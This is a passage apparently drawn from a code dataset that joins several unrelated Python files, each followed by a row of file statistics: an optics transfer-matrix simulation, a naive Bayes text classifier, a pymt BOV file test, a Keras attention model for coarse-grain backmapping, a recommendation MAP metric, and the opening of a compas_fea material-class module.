m = datalib.alloy(lda*nm, 0.30, 'Air','SiO2','Bruggeman')
msio2np_ideal_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
m = datalib.alloy(lda*nm, 0.30, 'Air','Si3N4','Bruggeman')
msi3n4np_ideal_fn = interp1d(lda, m, kind='linear') # make mat data a FUNCTION of lda, in nm
d_list = [inf, 800, 2000, 200, inf] # list of layer thicknesses in nm
c_list = ['i','c','c','c','i']
theta = 0
T_list = [];
R_list = [];
A_list = [];
for lda0 in lda:
n_list = [1, msi3n4np_ideal_fn(lda0), msio2np_ideal_fn(lda0), mag_fn(lda0), 1]
inc_tmm_data = tmm.inc_tmm('s',n_list,d_list,c_list,theta,lda0)
A_list.append(tmm.inc_absorp_in_each_layer(inc_tmm_data)) #stores as list of np.arrays
T_list.append(inc_tmm_data['T'])
R_list.append(inc_tmm_data['R'])
A = stack(A_list, axis = 0) # convert list of np.arrays to single np.array
T = array(T_list, dtype = complex) # Convert list to array for math operations
R = array(R_list, dtype = complex) # Convert list to array for math operations
##############################################################################
##############################################################################
#%%
"""
Plot TMM result with measured result
"""
#plt.figure()
#plt.plot(lda,Rref*100,'k--', label = 'Si Reflection')
##plt.plot(lda, (np_TR)*cal*100, 'k', label = 'Measured structure reflection')
#plt.plot(lda, Rideal*100,'k:', label = 'Bruggeman structure reflection')
#
##plt.plot(lda, (si_vis_TR-np_vis_TR)*cal*100,'r', label = 'Measured SiO2 NP absorption')
##plt.plot(lda, (A[:,1]+A[:,2]+A[:,3])*100,'r:', label = 'Fitted Bruggeman SiO2 NP absorption')
##plt.plot(lda, (Aideal[:,1]+Aideal[:,2]+Aideal[:,3])*100,'r--', label = 'Ideal Bruggeman SiO2 NP absorption')
#
##plt.plot(lda, Aideal[:,1]*100,'r:', label = 'Bruggeman SiO2 NP roughness absorption')
##plt.plot(lda, Aideal[:,2]*100,'r', label = 'Bruggeman SiO2 NP film absorption')
##plt.plot(lda, Aideal[:,4]*100,'r--', label = 'Bruggeman Si absorption')
##plt.plot(lda, A[:,3]*100,'r', label = 'SiO2 native oxide absorption')
#
##plt.plot(lda, 1-np_vis_TR*cal, label = 'Measured film Absorption')
#
##plt.plot(lda, si_vis_TR*cal, label = 'Measured si reflection')
#plt.xlabel('Wavelength (nm)')
#plt.ylabel('%')
#plt.title('Transmission, reflection, and absorption at normal incidence')
#plt.legend()
#plt.show()
##############################################################################
##############################################################################
#%%
"""
Plot R and T TMM and measured result
"""
#plt.figure()
#plt.plot(lda, T*100,'b:', label = 'Transmission')
#plt.plot(lda, R*100,'k:', label = 'Reflection')
#plt.plot(lda, (1-T-R)*100,':', label = 'Absorption')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 1 \n (30% $Si_{3}N_{4}$ Brugg.)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 2 \n (30% $SiO_{2}$ Brugg.)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 3 \n (Bulk $SiO_{2}$)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 4 \n (Bulk $Si_{3}N_{4}$)')
#plt.plot(lda, A[:,1]*100,':', label = 'Abs. layer 5 \n (Ag reflector)')
#plt.xlabel('Wavelength (nm)')
#plt.ylabel('%')
#plt.title('Transmission, reflection, and absorption at normal incidence')
#plt.legend()
#plt.show()
##############################################################################
##############################################################################
#%%
"""
Plot TMM and measured absorption
"""
if (min(lda) > 1999):
t_atmosphere = datalib.ATData(lda*1e-9)
fig = plt.figure()
plt.plot(lda*1e-3, t_atmosphere*100,'k', alpha = 0.1, label='Atmospheric \n transmittance')
plt.plot(lda*1e-3, (1-T-R)*100,'r', label = 'Device absorption')
plt.plot(lda*1e-3, A[:,1]*100,':', label = 'Abs. $Si_{3}N_{4}$ NP \n (30%, Brugg.)')
plt.plot(lda*1e-3, A[:,2]*100,':', label = 'Abs. $SiO_{2}$ NP \n (30%, Brugg.)')
plt.plot(lda*1e-3, A[:,3]*100,':', label = 'Abs. $SiO_{2}$')
plt.plot(lda*1e-3, A[:,4]*100,':', label = 'Abs. $Si_{3}N_{4}$')
plt.plot(lda*1e-3, A[:,5]*100,':', label = 'Abs. $Ag$')
plt.xlabel('Wavelength (nm)')
plt.ylabel('%')
#plt.title('Transmission, reflection, and absorption at normal incidence')
plt.legend()
plt.show()
# plt.plot(lda*1e-3, (1-np_R*calR-np_T*calT)*100,'k', label = 'Total absorption \n (measured)')
# plt.plot(lda*1e-3, (1-Tideal-Rideal)*100, 'k:', label = 'Total absorption \n (simulated)')
# plt.plot(lda*1e-3, Aideal[:,1]*100,'b:', label = 'Roughness layer \n (9% $SiO_{2}$ Brugg.)')
# plt.plot(lda*1e-3, Aideal[:,2]*100,'r:', label = 'Nanoparticle layer \n (15% $SiO_2$ Brugg.)')
# plt.plot(lda*1e-3, Aideal[:,4]*100,'m:', label = 'Si Substrate')
# #plt.plot(lda, Aideal[:,3]*100,'y:', label = 'SiO2 native oxide absorption')
#
# plt.xlabel('Wavelength (um)')
# plt.ylabel('Absorption (%)')
# #plt.title('Absorption at normal incidence')
# #ax.legend().draggable()
# plt.tight_layout(rect=[-0.10,0,0.75,1])
# plt.legend(bbox_to_anchor=(1.04, 1))
# plt.show()
else:
AM1p5 = datalib.AM(lda*1e-9)
fig = plt.figure()
plt.plot(lda, (AM1p5/(1.4*1e9))*100,'k', alpha = 0.1, label='AM1.5')
# plt.plot(lda, T*100,'b:', label = 'Transmission')
# plt.plot(lda, R*100,'k:', label = 'Reflection')
plt.plot(lda, (1-T-R)*100,'r', label = 'Device absorption')
plt.plot(lda, A[:,1]*100,':', label = 'Abs. $Si_{3}N_{4}$ NP \n (30%, Brugg.)')
plt.plot(lda, A[:,1]*100,':', label = 'Abs. $SiO_{2}$ NP \n (30%, Brugg.)')
plt.plot(lda, A[:,1]*100,':', label = 'Abs. $SiO_{2}$')
plt.plot(lda, A[:,1]*100,':', label = 'Abs. $Si_{3}N_{4}$')
plt.plot(lda, A[:,1]*100,':', label = 'Abs. $Ag$')
plt.xlabel('Wavelength (nm)')
plt.ylabel('%')
#plt.title('Transmission, reflection, and absorption at normal incidence')
plt.legend()
plt.show()
#plt.plot(lda, Aideal[:,3]*100,'y:', label = 'SiO2 native oxide absorption')
# plt.xlabel('Wavelength (nm)')
# plt.ylabel('Absorption (%)')
# #plt.title('Absorption at normal incidence')
# #ax.legend().draggable()
#
# plt.tight_layout(rect=[-0.10,0,0.75,1])
# plt.legend(bbox_to_anchor=(1.04, 1))
# plt.show()
| 39.569231 | 135 | 0.585051 | 1,490 | 10,288 | 3.951007 | 0.185235 | 0.05113 | 0.073042 | 0.022422 | 0.612027 | 0.554952 | 0.501444 | 0.491931 | 0.487685 | 0.446237 | 0 | 0.048148 | 0.160187 | 10,288 | 259 | 136 | 39.722008 | 0.633218 | 0.566874 | 0 | 0.16129 | 0 | 0 | 0.143344 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.112903 | 0 | 0.112903 | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa0c62575bd34e4cba52c7f7400939a06bfae09 | 1,592 | py | Python | after/bayes.py | Windsooon/Comments | 47a6077e3bf46743a8da3d59ea8ebcd5601c9fe9 | [
"MIT"
] | 1 | 2020-07-08T06:17:54.000Z | 2020-07-08T06:17:54.000Z | after/bayes.py | Windsooon/Comments | 47a6077e3bf46743a8da3d59ea8ebcd5601c9fe9 | [
"MIT"
] | null | null | null | after/bayes.py | Windsooon/Comments | 47a6077e3bf46743a8da3d59ea8ebcd5601c9fe9 | [
"MIT"
] | null | null | null | import os
import csv
import pickle
import pandas as pd
import numpy as np
import sklearn
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.model_selection import KFold
from sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score
from sklearn.naive_bayes import MultinomialNB
from comments.base import cut_words, STOP_WORDS, DATA_DIR
# Access all data from csv file
df = pd.read_csv(os.path.join(DATA_DIR, 'fin_final.csv'), skipinitialspace=True)
X = df['comments']
y = df['useful']
kf = KFold(n_splits=10, random_state=42, shuffle=True)
accuracies, precisions, recalls, f1s = [], [], [], []
for train_index, test_index in kf.split(X):
X_train = X[train_index]
y_train = y[train_index]
X_test = X[test_index]
y_test = y[test_index]
vectorizer = sklearn.feature_extraction.text.CountVectorizer(
tokenizer=cut_words,
stop_words=STOP_WORDS)
training_data = vectorizer.fit_transform(X_train)
testing_data = vectorizer.transform(X_test)
naive_bayes = MultinomialNB()
naive_bayes.fit(training_data, y_train)
preds = naive_bayes.predict(testing_data)
accuracies.append(accuracy_score(y_test, preds))
precisions.append(precision_score(y_test, preds))
recalls.append(recall_score(y_test, preds))
f1s.append(f1_score(y_test, preds))
average_accuracy = np.mean(accuracies)
average_precision = np.mean(precisions)
average_recall = np.mean(recalls)
average_f1 = np.mean(f1s)
print(average_accuracy)
print(average_precision)
print(average_recall)
print(average_f1)
| 31.215686 | 83 | 0.766332 | 232 | 1,592 | 5 | 0.344828 | 0.025862 | 0.034483 | 0.051724 | 0.053448 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008017 | 0.138191 | 1,592 | 50 | 84 | 31.84 | 0.837464 | 0.018216 | 0 | 0 | 0 | 0 | 0.017297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.268293 | 0 | 0.268293 | 0.097561 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa123a46e6c48d9f51257a647096c4fc2fe9422 | 818 | py | Python | deprecated/printers/bov/tests/test_database.py | nielsdrost/pymt | ae39bf807428827a6904202bf4d3b927daa255ea | [
"MIT"
] | null | null | null | deprecated/printers/bov/tests/test_database.py | nielsdrost/pymt | ae39bf807428827a6904202bf4d3b927daa255ea | [
"MIT"
] | null | null | null | deprecated/printers/bov/tests/test_database.py | nielsdrost/pymt | ae39bf807428827a6904202bf4d3b927daa255ea | [
"MIT"
] | null | null | null | import os
import numpy as np
from pymt.grids import RasterField
from pymt.printers.bov.database import Database
def test_bov_database(tmpdir):
data = np.arange(6.)
field = RasterField((3, 2), (1., 1.), (0., 0.))
field.add_field("Elevation", data, centering="point")
with tmpdir.as_cwd():
db = Database()
db.open("Bov_database.bov", "Elevation")
# Write the field to the database. Since BOV files only
# store one variable, append the variable name to the file name.
db.write(field)
assert os.path.isfile("Bov_database_0000.bov")
data *= 2.
db.write(field)
assert os.path.isfile("Bov_database_0001.bov")
data *= 2.
db.write(field)
assert os.path.isfile("Bov_database_0002.bov")
db.close()
| 24.787879 | 72 | 0.625917 | 114 | 818 | 4.394737 | 0.438596 | 0.131737 | 0.071856 | 0.107784 | 0.277445 | 0.277445 | 0.277445 | 0.277445 | 0.277445 | 0.195609 | 0 | 0.034314 | 0.251834 | 818 | 32 | 73 | 25.5625 | 0.784314 | 0.141809 | 0 | 0.25 | 0 | 0 | 0.145923 | 0.090129 | 0 | 0 | 0 | 0 | 0.15 | 1 | 0.05 | false | 0 | 0.2 | 0 | 0.25 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa18c419b9bddacf91037d88c2cff23c5558bdb | 8,820 | py | Python | flowws_keras_geometry/models/PDBInverseCoarseGrain.py | klarh/flowws-keras-geometry | f6768ff20fdbf85deacd234c116919219500ecbe | [
"MIT"
] | 2 | 2021-11-17T05:08:01.000Z | 2021-11-28T17:17:08.000Z | flowws_keras_geometry/models/PDBInverseCoarseGrain.py | klarh/flowws-keras-geometry | f6768ff20fdbf85deacd234c116919219500ecbe | [
"MIT"
] | null | null | null | flowws_keras_geometry/models/PDBInverseCoarseGrain.py | klarh/flowws-keras-geometry | f6768ff20fdbf85deacd234c116919219500ecbe | [
"MIT"
] | null | null | null |
import flowws
from flowws import Argument as Arg
import tensorflow as tf
from tensorflow import keras
from .internal import HUGE_FLOAT, PairwiseVectorDifference, \
PairwiseVectorDifferenceSum, VectorAttention, Vector2VectorAttention
class CoarseGrainAttention(Vector2VectorAttention):
def build(self, input_shape):
v_shape = input_shape[1]
result = super().build(input_shape[:-1])
if self.join_fun == 'concat':
# always joining neighborhood values and invariant values
stdev = tf.sqrt(2./3/v_shape[-1])
self.join_kernels.append(self.add_weight(
name='join_kernel_{}'.format(3), shape=(v_shape[-1], v_shape[-1]),
initializer=keras.initializers.RandomNormal(stddev=stdev)
))
return result
def compute_mask(self, inputs, mask=None):
if mask is None:
return
(r_mask, v_mask, cv_mask) = mask
return cv_mask
def _expand_products(self, positions, values):
(bcast, invars, covars, vs) = super()._expand_products(positions, values)
new_bcast = []
for idx in bcast:
idx = list(idx)
idx.insert(-1 - self.rank, None)
new_bcast.append(idx)
invars = tf.expand_dims(invars, -2 - self.rank)
covars = tf.expand_dims(covars, -2 - self.rank)
new_vs = [tf.expand_dims(v, -2 - self.rank) for v in vs]
return new_bcast, invars, covars, new_vs
def _intermediates(self, inputs, mask=None):
(positions, values, child_values) = inputs
(broadcast_indices, invariants, covariants, expanded_values) = \
self._expand_products(positions, values)
neighborhood_values = self.merge_fun_(*expanded_values)
invar_values = self.value_net(invariants)
swap_i = -self.rank - 1
swap_j = swap_i - 1
child_expand_indices = list(broadcast_indices[-1])
child_expand_indices[swap_i], child_expand_indices[swap_j] = \
child_expand_indices[swap_j], child_expand_indices[swap_i]
child_values = child_values[child_expand_indices]
joined_values = self.join_fun_(child_values, invar_values, neighborhood_values)
scales = self.scale_net(joined_values)
scores = self.score_net(joined_values)
old_shape = tf.shape(scores)
if mask is not None:
(position_mask, value_mask, child_value_mask) = mask
if position_mask is not None:
position_mask = tf.expand_dims(position_mask, -1)
position_mask = tf.reduce_all([position_mask[idx] for idx in broadcast_indices[:-1]], axis=0)
else:
position_mask = True
if value_mask is not None:
value_mask = tf.expand_dims(value_mask, -1)
value_mask = tf.reduce_all([value_mask[idx] for idx in broadcast_indices[:-1]], axis=0)
else:
value_mask = True
product_mask = tf.logical_and(position_mask, value_mask)
scores = tf.where(product_mask, scores, -HUGE_FLOAT)
if self.reduce:
dims = -(self.rank + 1)
reduce_axes = tuple(-i - 2 for i in range(self.rank))
else:
dims = -self.rank
reduce_axes = tuple(-i - 2 for i in range(self.rank - 1))
shape = tf.concat([old_shape[:dims], tf.math.reduce_prod(old_shape[dims:], keepdims=True)], -1)
scores = tf.reshape(scores, shape)
attention = tf.reshape(tf.nn.softmax(scores), old_shape)
output = tf.reduce_sum(attention*covariants*scales, reduce_axes)
return dict(attention=attention, output=output, invariants=invariants)
@flowws.add_stage_arguments
class PDBInverseCoarseGrain(flowws.Stage):
"""Build a geometric attention network for a coarse-grain backmapping task.
This module specifies the architecture of a network to produce
atomic coordinates from a set of coarse-grained beads.
"""
ARGS = [
Arg('rank', None, int, 2,
help='Degree of correlations (n-vectors) to consider'),
Arg('n_dim', '-n', int, 32,
help='Working dimensionality of point representations'),
Arg('dilation', None, float, 2,
help='Working dimension dilation factor for MLP components'),
Arg('merge_fun', '-m', str, 'concat',
help='Method to merge point representations'),
Arg('join_fun', '-j', str, 'concat',
help='Method to join invariant and point representations'),
Arg('n_blocks_coarse', None, int, 2,
help='Number of deep blocks to use in the coarse-grain space'),
Arg('n_blocks_fine', None, int, 2,
help='Number of deep blocks to use in the coarse-grain space'),
Arg('block_nonlinearity', None, bool, True,
help='If True, add a nonlinearity to the end of each block'),
Arg('residual', '-r', bool, True,
help='If True, use residual connections within blocks'),
Arg('activation', '-a', str, 'relu',
help='Activation function to use inside the network'),
Arg('attention_vector_inputs', None, bool, False,
help='Use input vectors for vector-vector attention'),
Arg('attention_learn_projection', None, bool, False,
help='Use learned projection weights for vector-vector attention'),
]
def run(self, scope, storage):
rank = self.arguments['rank']
n_dim = self.arguments['n_dim']
merge_fun = self.arguments['merge_fun']
join_fun = self.arguments['join_fun']
train_data = scope['train_generator']
sample_batch = next(train_data)
x_in = keras.layers.Input(sample_batch[0][0].shape[1:], name='rij')
v_in = keras.layers.Input(sample_batch[0][1].shape[1:], name='tij')
cv_in = keras.layers.Input(sample_batch[0][2].shape[1:], name='child_t')
cv_emb = keras.layers.Embedding(len(scope['child_type_names']), n_dim, mask_zero=True)(cv_in)
dilation_dim = round(n_dim*self.arguments['dilation'])
def make_scorefun():
layers = [keras.layers.Dense(dilation_dim)]
layers.append(keras.layers.Activation(self.arguments['activation']))
layers.append(keras.layers.Dense(1))
return keras.models.Sequential(layers)
def make_valuefun(dim):
layers = [keras.layers.Dense(dilation_dim)]
layers.append(keras.layers.LayerNormalization())
layers.append(keras.layers.Activation(self.arguments['activation']))
layers.append(keras.layers.Dense(dim))
return keras.models.Sequential(layers)
def make_block(last):
residual_in = last
last = VectorAttention(
make_scorefun(), make_valuefun(n_dim), False, rank=rank,
join_fun=join_fun,
merge_fun=merge_fun)([x_in, last])
if self.arguments['block_nonlinearity']:
last = make_valuefun(n_dim)(last)
if self.arguments['residual']:
last = last + residual_in
return last
def make_vector_block(vec):
residual_in = vec
vec = PairwiseVectorDifference()(vec)
(vec, ivs, att) = Vector2VectorAttention(
make_scorefun(), make_valuefun(n_dim), make_valuefun(1), True, rank=rank,
join_fun=join_fun, merge_fun=merge_fun,
use_input_vectors=self.arguments['attention_vector_inputs'],
learn_vector_projection=self.arguments['attention_learn_projection'])(
[vec, delta_v], return_invariants=True, return_attention=True)
if self.arguments['residual']:
vec = residual_in + vec
return vec
last = keras.layers.Dense(n_dim)(v_in)
for _ in range(self.arguments['n_blocks_coarse']):
last = make_block(last)
(vec, ivs, att) = CoarseGrainAttention(
make_scorefun(), make_valuefun(n_dim), make_valuefun(1), True, name='final_attention',
rank=1,
join_fun=join_fun,
merge_fun=merge_fun)(
[x_in, last, cv_emb], return_invariants=True, return_attention=True)
delta_v = PairwiseVectorDifferenceSum()(cv_emb)
delta_v = keras.layers.Dense(n_dim)(delta_v)
for _ in range(self.arguments['n_blocks_fine']):
vec = make_vector_block(vec)
scope['input_symbol'] = [x_in, v_in, cv_in]
scope['output'] = vec
scope['loss'] = 'mse'
scope['attention_model'] = keras.models.Model([x_in, v_in, cv_in], att)
scope['invariant_model'] = keras.models.Model([x_in, v_in, cv_in], ivs)
| 41.023256 | 109 | 0.622222 | 1,095 | 8,820 | 4.8 | 0.206393 | 0.034627 | 0.020548 | 0.02188 | 0.276256 | 0.246195 | 0.209094 | 0.165335 | 0.165335 | 0.152397 | 0 | 0.007422 | 0.26678 | 8,820 | 214 | 110 | 41.214953 | 0.805319 | 0.028118 | 0 | 0.090361 | 0 | 0 | 0.123845 | 0.011461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054217 | false | 0 | 0.03012 | 0 | 0.156627 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa221e1979ae3e08b502d632de23a867c0630aa | 3,565 | py | Python | DeepLearningExamples/TensorFlow/Recommendation/WideAndDeep/utils/metrics.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow/Recommendation/WideAndDeep/utils/metrics.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow/Recommendation/WideAndDeep/utils/metrics.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from trainer import features
# rough approximation for MAP metric for measuring ad quality
# roughness comes from batch sizes falling between groups of
# display ids
# hack because of name clashes. Probably makes sense to rename features
DISPLAY_ID_COLUMN = features.DISPLAY_ID_COLUMN
def map_custom_metric(features, labels, predictions):
display_ids = tf.reshape(features[DISPLAY_ID_COLUMN], [-1])
predictions = predictions['probabilities'][:, 1]
labels = labels[:, 0]
# Processing unique display_ids, indexes and counts
# Sorting needed in case the same display_id occurs in two different places
sorted_ids = tf.argsort(display_ids)
display_ids = tf.gather(display_ids, indices=sorted_ids)
predictions = tf.gather(predictions, indices=sorted_ids)
labels = tf.gather(labels, indices=sorted_ids)
_, display_ids_idx, display_ids_ads_count = tf.unique_with_counts(
display_ids, out_idx=tf.int64)
pad_length = 30 - tf.reduce_max(display_ids_ads_count)
pad_fn = lambda x: tf.pad(x, [(0, 0), (0, pad_length)])
preds = tf.RaggedTensor.from_value_rowids(
predictions, display_ids_idx).to_tensor()
labels = tf.RaggedTensor.from_value_rowids(
labels, display_ids_idx).to_tensor()
labels = tf.argmax(labels, axis=1)
return {
'map': tf.compat.v1.metrics.average_precision_at_k(
predictions=pad_fn(preds),
labels=labels,
k=12,
name="streaming_map")}
IS_LEAK_COLUMN = features.IS_LEAK_COLUMN
def map_custom_metric_with_leak(features, labels, predictions):
display_ids = features[DISPLAY_ID_COLUMN]
display_ids = tf.reshape(display_ids, [-1])
is_leak_tf = features[IS_LEAK_COLUMN]
is_leak_tf = tf.reshape(is_leak_tf, [-1])
predictions = predictions['probabilities'][:, 1]
predictions = predictions + tf.cast(is_leak_tf, tf.float32)
labels = labels[:, 0]
# Processing unique display_ids, indexes and counts
# Sorting needed in case the same display_id occurs in two different places
sorted_ids = tf.argsort(display_ids)
display_ids = tf.gather(display_ids, indices=sorted_ids)
predictions = tf.gather(predictions, indices=sorted_ids)
labels = tf.gather(labels, indices=sorted_ids)
_, display_ids_idx, display_ids_ads_count = tf.unique_with_counts(
display_ids, out_idx=tf.int64)
pad_length = 30 - tf.reduce_max(display_ids_ads_count)
pad_fn = lambda x: tf.pad(x, [(0, 0), (0, pad_length)])
preds = tf.RaggedTensor.from_value_rowids(predictions, display_ids_idx).to_tensor()
labels = tf.RaggedTensor.from_value_rowids(labels, display_ids_idx).to_tensor()
labels = tf.argmax(labels, axis=1)
return {
'map_with_leak': tf.compat.v1.metrics.average_precision_at_k(
predictions=pad_fn(preds),
labels=labels,
k=12,
name="streaming_map_with_leak")}
| 38.75 | 87 | 0.722861 | 506 | 3,565 | 4.859684 | 0.304348 | 0.101667 | 0.03904 | 0.037414 | 0.616511 | 0.53843 | 0.53843 | 0.53843 | 0.53843 | 0.53843 | 0 | 0.013425 | 0.185133 | 3,565 | 91 | 88 | 39.175824 | 0.833046 | 0.289201 | 0 | 0.576923 | 0 | 0 | 0.031051 | 0.009156 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.038462 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bfa6e37ce663c12f0fdad157e24b3fc3bb9524e5 | 11,809 | py | Python | src/compas_fea/structure/material.py | franaudo/fea | e164256bac179116520d19d6fc54c98de0610896 | [
"MIT"
] | 28 | 2018-02-16T17:21:47.000Z | 2022-02-27T21:42:17.000Z | src/compas_fea/structure/material.py | franaudo/fea | e164256bac179116520d19d6fc54c98de0610896 | [
"MIT"
] | 115 | 2017-11-30T17:12:47.000Z | 2022-01-26T07:41:34.000Z | src/compas_fea/structure/material.py | franaudo/fea | e164256bac179116520d19d6fc54c98de0610896 | [
"MIT"
] | 13 | 2018-05-08T13:03:28.000Z | 2022-01-23T13:37:06.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from math import log
# Author(s): Andrew Liew (github.com/andrewliew)
__all__ = [
'Material',
'Concrete',
'ConcreteSmearedCrack',
'ConcreteDamagedPlasticity',
'ElasticIsotropic',
'Stiff',
'ElasticOrthotropic',
'ElasticPlastic',
# 'ThermalMaterial',
'Steel'
]
class Material(object):
"""Initialises base Material object.
Parameters
----------
name : str
Name of the Material object.
Attributes
----------
name : str
Name of the Material object.
"""
def __init__(self, name):
self.__name__ = 'Material'
self.name = name
self.attr_list = ['name']
def __str__(self):
print('\n')
print('compas_fea {0} object'.format(self.__name__))
print('-' * (len(self.__name__) + 18))
for attr in self.attr_list:
print('{0:<11} : {1}'.format(attr, getattr(self, attr)))
return ''
def __repr__(self):
return '{0}({1})'.format(self.__name__, self.name)
# ==============================================================================
# linear elastic
# ==============================================================================
class ElasticIsotropic(Material):
"""Elastic, isotropic and homogeneous material.
Parameters
----------
name : str
Material name.
E : float
Young's modulus E [Pa].
v : float
Poisson's ratio v [-].
p : float
Density [kg/m3].
tension : bool
Can take tension.
compression : bool
Can take compression.
"""
def __init__(self, name, E, v, p, tension=True, compression=True):
Material.__init__(self, name=name)
self.__name__ = 'ElasticIsotropic'
self.name = name
self.E = {'E': E}
self.v = {'v': v}
self.G = {'G': 0.5 * E / (1 + v)}
self.p = p
self.tension = tension
self.compression = compression
self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression'])
class Stiff(ElasticIsotropic):
"""Elastic, very stiff and massless material.
Parameters
----------
name : str
Material name.
E : float
Young's modulus E [Pa].
"""
def __init__(self, name, E=10**13):
ElasticIsotropic.__init__(self, name=name, E=E, v=0.3, p=10**(-1))
self.__name__ = 'Stiff'
class ElasticOrthotropic(Material):
"""Elastic, orthotropic and homogeneous material.
Parameters
----------
name : str
Material name.
Ex : float
Young's modulus Ex in x direction [Pa].
Ey : float
Young's modulus Ey in y direction [Pa].
Ez : float
Young's modulus Ez in z direction [Pa].
vxy : float
Poisson's ratio vxy in x-y directions [-].
vyz : float
Poisson's ratio vyz in y-z directions [-].
vzx : float
Poisson's ratio vzx in z-x directions [-].
Gxy : float
Shear modulus Gxy in x-y directions [Pa].
Gyz : float
Shear modulus Gyz in y-z directions [Pa].
Gzx : float
Shear modulus Gzx in z-x directions [Pa].
p : float
Density [kg/m3].
tension : bool
Can take tension.
compression : bool
Can take compression.
Notes
-----
- Can be created but is currently not implemented.
"""
def __init__(self, name, Ex, Ey, Ez, vxy, vyz, vzx, Gxy, Gyz, Gzx, p, tension=True, compression=True):
Material.__init__(self, name=name)
self.__name__ = 'ElasticOrthotropic'
self.name = name
self.E = {'Ex': Ex, 'Ey': Ey, 'Ez': Ez}
self.v = {'vxy': vxy, 'vyz': vyz, 'vzx': vzx}
self.G = {'Gxy': Gxy, 'Gyz': Gyz, 'Gzx': Gzx}
self.p = p
self.tension = tension
self.compression = compression
self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression'])
# ==============================================================================
# non-linear general
# ==============================================================================
class ElasticPlastic(Material):
"""Elastic and plastic, isotropic and homogeneous material.
Parameters
----------
name : str
Material name.
E : float
Young's modulus E [Pa].
v : float
Poisson's ratio v [-].
p : float
Density [kg/m3].
f : list
Plastic stress data (positive tension values) [Pa].
e : list
Plastic strain data (positive tension values) [-].
Notes
-----
- Plastic stress--strain pairs applies to both compression and tension.
"""
def __init__(self, name, E, v, p, f, e):
Material.__init__(self, name=name)
fc = [-i for i in f]
ec = [-i for i in e]
self.__name__ = 'ElasticPlastic'
self.name = name
self.E = {'E': E}
self.v = {'v': v}
self.G = {'G': 0.5 * E / (1 + v)}
self.p = p
self.tension = {'f': f, 'e': e}
self.compression = {'f': fc, 'e': ec}
self.attr_list.extend(['E', 'v', 'G', 'p', 'tension', 'compression'])
# ==============================================================================
# non-linear metal
# ==============================================================================
class Steel(Material):
"""Bi-linear steel with given yield stress.
Parameters
----------
name : str
Material name.
fy : float
Yield stress [MPa].
fu : float
Ultimate stress [MPa].
eu : float
Ultimate strain [%].
E : float
Young's modulus E [GPa].
v : float
Poisson's ratio v [-].
p : float
Density [kg/m3].
"""
def __init__(self, name, fy=355, fu=None, eu=20, E=210, v=0.3, p=7850):
Material.__init__(self, name=name)
E *= 10.**9
fy *= 10.**6
eu *= 0.01
if not fu:
fu = fy
else:
fu *= 10.**6
ep = eu - fy / E
f = [fy, fu]
e = [0, ep]
fc = [-i for i in f]
ec = [-i for i in e]
self.__name__ = 'Steel'
self.name = name
self.fy = fy
self.fu = fu
self.eu = eu
self.ep = ep
self.E = {'E': E}
self.v = {'v': v}
self.G = {'G': 0.5 * E / (1 + v)}
self.p = p
self.tension = {'f': f, 'e': e}
self.compression = {'f': fc, 'e': ec}
